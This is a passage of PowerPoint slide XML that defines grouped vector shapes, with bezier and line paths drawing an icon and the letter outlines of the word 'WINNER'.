                        <a:pt x="226" y="509"/>
                        <a:pt x="293" y="531"/>
                        <a:pt x="293" y="531"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="293" y="531"/>
                        <a:pt x="360" y="509"/>
                        <a:pt x="414" y="457"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="482" y="457"/>
                        <a:pt x="482" y="457"/>
                        <a:pt x="482" y="457"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="482" y="479"/>
                        <a:pt x="482" y="479"/>
                        <a:pt x="482" y="479"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="585" y="479"/>
                        <a:pt x="585" y="479"/>
                        <a:pt x="585" y="479"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="569" y="448"/>
                        <a:pt x="569" y="448"/>
                        <a:pt x="569" y="448"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="585" y="417"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="121" y="335"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="209"/>
                        <a:pt x="108" y="20"/>
                        <a:pt x="108" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="20"/>
                        <a:pt x="183" y="62"/>
                        <a:pt x="293" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="293" y="21"/>
                        <a:pt x="293" y="21"/>
                        <a:pt x="293" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="402" y="62"/>
                        <a:pt x="477" y="20"/>
                        <a:pt x="477" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="477" y="20"/>
                        <a:pt x="487" y="209"/>
                        <a:pt x="464" y="335"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="462" y="349"/>
                        <a:pt x="458" y="361"/>
                        <a:pt x="454" y="372"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="346" y="348"/>
                        <a:pt x="239" y="347"/>
                        <a:pt x="131" y="372"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="127" y="361"/>
                        <a:pt x="123" y="348"/>
                        <a:pt x="121" y="335"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="293" y="511"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="293" y="511"/>
                        <a:pt x="222" y="487"/>
                        <a:pt x="171" y="432"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="427"/>
                        <a:pt x="197" y="424"/>
                        <a:pt x="223" y="421"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="258" y="416"/>
                        <a:pt x="325" y="416"/>
                        <a:pt x="359" y="421"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="385" y="424"/>
                        <a:pt x="398" y="428"/>
                        <a:pt x="413" y="434"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="362" y="488"/>
                        <a:pt x="293" y="511"/>
                        <a:pt x="293" y="5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801" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="237" name="Group 236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE8EA4CF-6427-E546-BEA8-C61C71781A7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1631714" y="5588203"/>
              <a:ext cx="669969" cy="791974"/>
              <a:chOff x="7306365" y="5588203"/>
              <a:chExt cx="669969" cy="791974"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="238" name="그룹 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06F9940-1963-4D4B-A317-4B04A16B9656}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7487117" y="5588203"/>
                <a:ext cx="308465" cy="419196"/>
                <a:chOff x="7319556" y="2405359"/>
                <a:chExt cx="1114425" cy="1514475"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="240" name="자유형: 도형 72">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D46101-E73A-054F-B309-FBF11A6AA156}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7576731" y="3466920"/>
                  <a:ext cx="133350" cy="104775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 48197 w 133350"/>
                    <a:gd name="connsiteY0" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX1" fmla="*/ 70390 w 133350"/>
                    <a:gd name="connsiteY1" fmla="*/ 25622 h 104775"/>
                    <a:gd name="connsiteX2" fmla="*/ 70675 w 133350"/>
                    <a:gd name="connsiteY2" fmla="*/ 25622 h 104775"/>
                    <a:gd name="connsiteX3" fmla="*/ 92488 w 133350"/>
                    <a:gd name="connsiteY3" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX4" fmla="*/ 111824 w 133350"/>
                    <a:gd name="connsiteY4" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX5" fmla="*/ 141732 w 133350"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX6" fmla="*/ 122396 w 133350"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX7" fmla="*/ 102203 w 133350"/>
                    <a:gd name="connsiteY7" fmla="*/ 83058 h 104775"/>
                    <a:gd name="connsiteX8" fmla="*/ 101918 w 133350"/>
                    <a:gd name="connsiteY8" fmla="*/ 83058 h 104775"/>
                    <a:gd name="connsiteX9" fmla="*/ 80581 w 133350"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX10" fmla="*/ 61150 w 133350"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX11" fmla="*/ 39243 w 133350"/>
                    <a:gd name="connsiteY11" fmla="*/ 83058 h 104775"/>
                    <a:gd name="connsiteX12" fmla="*/ 38862 w 133350"/>
                    <a:gd name="connsiteY12" fmla="*/ 83058 h 104775"/>
                    <a:gd name="connsiteX13" fmla="*/ 19241 w 133350"/>
                    <a:gd name="connsiteY13" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX14" fmla="*/ 0 w 133350"/>
                    <a:gd name="connsiteY14" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX15" fmla="*/ 28575 w 133350"/>
                    <a:gd name="connsiteY15" fmla="*/ 108680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3350" h="104775">
                      <a:moveTo>
                        <a:pt x="48197" y="108680"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="70390" y="25622"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="70675" y="25622"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="92488" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111824" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141732" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="122396" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102203" y="83058"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="101918" y="83058"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80581" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="61150" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="39243" y="83058"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38862" y="83058"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19241" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28575" y="10868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1" name="자유형: 도형 73">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24372117-0941-C842-A478-D79EA058AAD9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7730941" y="3466920"/>
                  <a:ext cx="19050" cy="104775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX1" fmla="*/ 19050 w 19050"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX2" fmla="*/ 19050 w 19050"/>
                    <a:gd name="connsiteY2" fmla="*/ 108585 h 104775"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 19050"/>
                    <a:gd name="connsiteY3" fmla="*/ 108585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050" h="104775">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="19050" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="108585"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="10858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2" name="자유형: 도형 74">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630A2B96-8C97-F540-9F53-2D2B34366505}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7772470" y="3466920"/>
                  <a:ext cx="85725" cy="104775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 18098 w 85725"/>
                    <a:gd name="connsiteY0" fmla="*/ 28766 h 104775"/>
                    <a:gd name="connsiteX1" fmla="*/ 18574 w 85725"/>
                    <a:gd name="connsiteY1" fmla="*/ 28766 h 104775"/>
                    <a:gd name="connsiteX2" fmla="*/ 68008 w 85725"/>
                    <a:gd name="connsiteY2" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX3" fmla="*/ 88106 w 85725"/>
                    <a:gd name="connsiteY3" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX4" fmla="*/ 88106 w 85725"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX5" fmla="*/ 70009 w 85725"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX6" fmla="*/ 70009 w 85725"/>
                    <a:gd name="connsiteY6" fmla="*/ 80010 h 104775"/>
                    <a:gd name="connsiteX7" fmla="*/ 69723 w 85725"/>
                    <a:gd name="connsiteY7" fmla="*/ 80010 h 104775"/>
                    <a:gd name="connsiteX8" fmla="*/ 20098 w 85725"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY10" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX11" fmla="*/ 18098 w 85725"/>
                    <a:gd name="connsiteY11" fmla="*/ 108680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5725" h="104775">
                      <a:moveTo>
                        <a:pt x="18098" y="28766"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="18574" y="28766"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68008" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="88106" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="88106" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="70009" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="70009" y="80010"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69723" y="80010"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20098" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18098" y="10868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3" name="자유형: 도형 75">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C067232B-019F-7540-AFBF-A74E548F942B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7882388" y="3466920"/>
                  <a:ext cx="85725" cy="104775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 18098 w 85725"/>
                    <a:gd name="connsiteY0" fmla="*/ 28766 h 104775"/>
                    <a:gd name="connsiteX1" fmla="*/ 18478 w 85725"/>
                    <a:gd name="connsiteY1" fmla="*/ 28766 h 104775"/>
                    <a:gd name="connsiteX2" fmla="*/ 68009 w 85725"/>
                    <a:gd name="connsiteY2" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX3" fmla="*/ 88011 w 85725"/>
                    <a:gd name="connsiteY3" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX4" fmla="*/ 88011 w 85725"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX5" fmla="*/ 69914 w 85725"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX6" fmla="*/ 69914 w 85725"/>
                    <a:gd name="connsiteY6" fmla="*/ 80010 h 104775"/>
                    <a:gd name="connsiteX7" fmla="*/ 69628 w 85725"/>
                    <a:gd name="connsiteY7" fmla="*/ 80010 h 104775"/>
                    <a:gd name="connsiteX8" fmla="*/ 20002 w 85725"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY10" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX11" fmla="*/ 18098 w 85725"/>
                    <a:gd name="connsiteY11" fmla="*/ 108680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85725" h="104775">
                      <a:moveTo>
                        <a:pt x="18098" y="28766"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="18478" y="28766"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="68009" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="88011" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="88011" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69914" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69914" y="80010"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69628" y="80010"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20002" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18098" y="10868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4" name="자유형: 도형 76">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{052B495D-1FD5-4446-87E8-62815153F1A0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7992973" y="3466920"/>
                  <a:ext cx="76200" cy="104775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 79248 w 76200"/>
                    <a:gd name="connsiteY0" fmla="*/ 92202 h 104775"/>
                    <a:gd name="connsiteX1" fmla="*/ 19050 w 76200"/>
                    <a:gd name="connsiteY1" fmla="*/ 92202 h 104775"/>
                    <a:gd name="connsiteX2" fmla="*/ 19050 w 76200"/>
                    <a:gd name="connsiteY2" fmla="*/ 60389 h 104775"/>
                    <a:gd name="connsiteX3" fmla="*/ 73819 w 76200"/>
                    <a:gd name="connsiteY3" fmla="*/ 60389 h 104775"/>
                    <a:gd name="connsiteX4" fmla="*/ 73819 w 76200"/>
                    <a:gd name="connsiteY4" fmla="*/ 44958 h 104775"/>
                    <a:gd name="connsiteX5" fmla="*/ 19050 w 76200"/>
                    <a:gd name="connsiteY5" fmla="*/ 44958 h 104775"/>
                    <a:gd name="connsiteX6" fmla="*/ 19050 w 76200"/>
                    <a:gd name="connsiteY6" fmla="*/ 16478 h 104775"/>
                    <a:gd name="connsiteX7" fmla="*/ 78200 w 76200"/>
                    <a:gd name="connsiteY7" fmla="*/ 16478 h 104775"/>
                    <a:gd name="connsiteX8" fmla="*/ 78200 w 76200"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 76200"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 76200"/>
                    <a:gd name="connsiteY10" fmla="*/ 108680 h 104775"/>
                    <a:gd name="connsiteX11" fmla="*/ 79248 w 76200"/>
                    <a:gd name="connsiteY11" fmla="*/ 108680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76200" h="104775">
                      <a:moveTo>
                        <a:pt x="79248" y="92202"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="19050" y="92202"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="60389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73819" y="60389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73819" y="44958"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="44958"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="16478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="78200" y="16478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="78200" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="108680"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="79248" y="10868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5" name="자유형: 도형 77">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C29B4DF8-DEC2-4E43-B9F0-95516FD0561F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8088795" y="3467015"/>
                  <a:ext cx="85725" cy="104775"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 19050 w 85725"/>
                    <a:gd name="connsiteY0" fmla="*/ 63818 h 104775"/>
                    <a:gd name="connsiteX1" fmla="*/ 47053 w 85725"/>
                    <a:gd name="connsiteY1" fmla="*/ 63818 h 104775"/>
                    <a:gd name="connsiteX2" fmla="*/ 68675 w 85725"/>
                    <a:gd name="connsiteY2" fmla="*/ 92583 h 104775"/>
                    <a:gd name="connsiteX3" fmla="*/ 71533 w 85725"/>
                    <a:gd name="connsiteY3" fmla="*/ 108585 h 104775"/>
                    <a:gd name="connsiteX4" fmla="*/ 91916 w 85725"/>
                    <a:gd name="connsiteY4" fmla="*/ 108585 h 104775"/>
                    <a:gd name="connsiteX5" fmla="*/ 86011 w 85725"/>
                    <a:gd name="connsiteY5" fmla="*/ 80010 h 104775"/>
                    <a:gd name="connsiteX6" fmla="*/ 69913 w 85725"/>
                    <a:gd name="connsiteY6" fmla="*/ 57055 h 104775"/>
                    <a:gd name="connsiteX7" fmla="*/ 69913 w 85725"/>
                    <a:gd name="connsiteY7" fmla="*/ 56769 h 104775"/>
                    <a:gd name="connsiteX8" fmla="*/ 87821 w 85725"/>
                    <a:gd name="connsiteY8" fmla="*/ 29337 h 104775"/>
                    <a:gd name="connsiteX9" fmla="*/ 51911 w 85725"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 104775"/>
                    <a:gd name="connsiteX11" fmla="*/ 0 w 85725"/>
                    <a:gd name="connsiteY11" fmla="*/ 108585 h 104775"/>
                    <a:gd name="connsiteX12" fmla="*/ 19050 w 85725"/>
                    <a:gd name="connsiteY12" fmla="*/ 108585 h 104775"/>
                    <a:gd name="connsiteX13" fmla="*/ 19050 w 85725"/>
                    <a:gd name="connsiteY13" fmla="*/ 63818 h 104775"/>
                    <a:gd name="connsiteX14" fmla="*/ 19050 w 85725"/>
                    <a:gd name="connsiteY14" fmla="*/ 15431 h 104775"/>
                    <a:gd name="connsiteX15" fmla="*/ 49911 w 85725"/>
                    <a:gd name="connsiteY15" fmla="*/ 15431 h 104775"/>
                    <a:gd name="connsiteX16" fmla="*/ 68771 w 85725"/>
                    <a:gd name="connsiteY16" fmla="*/ 32004 h 104775"/>
                    <a:gd name="connsiteX17" fmla="*/ 50197 w 85725"/>
                    <a:gd name="connsiteY17" fmla="*/ 49340 h 104775"/>
                    <a:gd name="connsiteX18" fmla="*/ 19050 w 85725"/>
                    <a:gd name="connsiteY18" fmla="*/ 49340 h 104775"/>
                    <a:gd name="connsiteX19" fmla="*/ 19050 w 85725"/>
                    <a:gd name="connsiteY19" fmla="*/ 15431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85725" h="104775">
                      <a:moveTo>
                        <a:pt x="19050" y="63818"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="47053" y="63818"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="64579" y="63818"/>
                        <a:pt x="68675" y="72676"/>
                        <a:pt x="68675" y="92583"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68675" y="97917"/>
                        <a:pt x="68675" y="103823"/>
                        <a:pt x="71533" y="108585"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="91916" y="108585"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="87821" y="104204"/>
                        <a:pt x="86011" y="92583"/>
                        <a:pt x="86011" y="80010"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86011" y="62865"/>
                        <a:pt x="76390" y="57912"/>
                        <a:pt x="69913" y="57055"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="69913" y="56769"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="73438" y="55531"/>
                        <a:pt x="87821" y="50197"/>
                        <a:pt x="87821" y="29337"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87821" y="10954"/>
                        <a:pt x="75628" y="0"/>
                        <a:pt x="51911" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="108585"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="108585"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="63818"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="19050" y="15431"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="49911" y="15431"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="59817" y="15431"/>
                        <a:pt x="68771" y="18193"/>
                        <a:pt x="68771" y="32004"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68771" y="43434"/>
                        <a:pt x="62198" y="49340"/>
                        <a:pt x="50197" y="49340"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19050" y="49340"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19050" y="1543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6" name="자유형: 도형 78">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB89543-7F91-4C48-8AD1-05250E013536}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7817713" y="3174026"/>
                  <a:ext cx="28575" cy="57150"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 17621 w 28575"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                    <a:gd name="connsiteX1" fmla="*/ 17145 w 28575"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 57150"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 28575"/>
                    <a:gd name="connsiteY2" fmla="*/ 58293 h 57150"/>
                    <a:gd name="connsiteX3" fmla="*/ 34576 w 28575"/>
                    <a:gd name="connsiteY3" fmla="*/ 58293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575" h="57150">
                      <a:moveTo>
                        <a:pt x="17621" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17145" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="58293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34576" y="5829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7" name="자유형: 도형 79">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7320542E-D933-6248-A675-0614B5A228D0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8031740" y="3170026"/>
                  <a:ext cx="57150" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 57341 w 57150"/>
                    <a:gd name="connsiteY0" fmla="*/ 48387 h 95250"/>
                    <a:gd name="connsiteX1" fmla="*/ 19526 w 57150"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 57150"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 57150"/>
                    <a:gd name="connsiteY3" fmla="*/ 96774 h 95250"/>
                    <a:gd name="connsiteX4" fmla="*/ 19526 w 57150"/>
                    <a:gd name="connsiteY4" fmla="*/ 96774 h 95250"/>
                    <a:gd name="connsiteX5" fmla="*/ 57341 w 57150"/>
                    <a:gd name="connsiteY5" fmla="*/ 48387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7150" h="95250">
                      <a:moveTo>
                        <a:pt x="57341" y="48387"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="57341" y="21241"/>
                        <a:pt x="50673" y="0"/>
                        <a:pt x="19526" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="96774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19526" y="96774"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="50673" y="96774"/>
                        <a:pt x="57341" y="75533"/>
